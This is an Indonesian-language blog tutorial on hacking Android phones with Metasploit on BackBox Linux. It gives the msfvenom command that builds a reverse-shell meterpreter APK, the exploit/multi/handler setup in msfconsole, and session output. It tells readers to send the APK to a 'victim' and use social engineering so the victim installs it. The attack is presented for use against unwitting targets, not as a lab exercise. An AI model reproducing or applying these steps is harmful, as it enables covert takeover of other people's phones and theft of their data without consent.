• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Hack Android dengan Metasploit di BackBox Linux

September 6, 2015 by Jack Wilder Leave a Comment

Assalamualaikum..
Kali ini saya akan share tutorial hack android dengan Metasploit di Backbox Linux. Tapi tentu saja kita membutuhkan payloads yang akan dijadikan umpan .

Pertama, buka terminal dan jalankan perintah ifconfig
Ini untuk mengetahui ip kita yang akan digunakan sebagai lhost nya.
Lalu masukkan perintah berikut :

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=1337 R > payload.apk

payload.apk ini yang akan digunakan sebagai payloads. Terserah dinamai apa.
Lalu buka msfconsole.

root@sistem:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [ip kita]
LHOST => 192.168.1.67
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > exploit

Setelah itu, kita share payload.apk tadi ke Android korban. Dan korban harus menginstall nya. Terserah pakai cara apa. Gunakan social engineering mu.
Dan tunggu di terminal mu sampai masuk ke meterpreter session.

[*] Started reverse handler on 10.11.12.29:1337
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 10.11.12.179
[*] Meterpreter session 1 opened (10.11.12.29:1337 -> 10.11.12.179:49164) at 2015-9-03 02:07:42 +0700

Another cool stuff :
  • Backdooring APK Files With Metasploit Payloads
Video :
Backdooring APK With Metasploit Payloads
Sekian tutor kali ini semoga bermanfaat.

Filed Under: Metasploit Tagged With: Android, BackBox, Exploit, Hacking, Metasploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Laravel PHPUnit Remote Code Execution

Prestashop Module Blocktestimonial File Upload Auto Exploit

MIME Type Sniffing pada Form Upload Gambar

Cracking FTP Password using Hydra on BackBox Linux

WordPress Army Knife CSRF File Upload Vulnerability

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Deteksi Kerentanan Execution After Redirect (EAR)

Deface dengan Metode Timthumb Remote Code Execution

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

LinuxSec / 12 queries in 0.10 seconds